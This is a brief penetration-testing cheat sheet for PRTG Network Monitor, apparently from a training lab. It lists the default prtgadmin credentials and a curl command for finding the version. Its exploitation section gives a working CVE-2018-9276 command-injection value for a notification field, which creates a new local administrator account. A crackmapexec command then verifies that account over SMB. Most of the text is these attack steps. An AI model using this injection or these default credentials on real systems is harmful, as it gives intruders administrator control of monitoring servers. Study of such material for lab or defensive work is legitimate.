PRTG Network Monitor

Discovery

Typically found in port 80, 443, 8080

Default Credentials

prtgadmin:prtgadmin

Enumeration

Getting Version Number

$ curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible;  MSIE 7.01; Windows NT 5.0)" | grep version

Exploitation

Adding new local admin using CVE-2018-9276

1. Setup > Account Settings > Notifications > Add new Notification

2. test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add

1. Save and click the "Test" button to execute our command

2. Using cme

$ sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!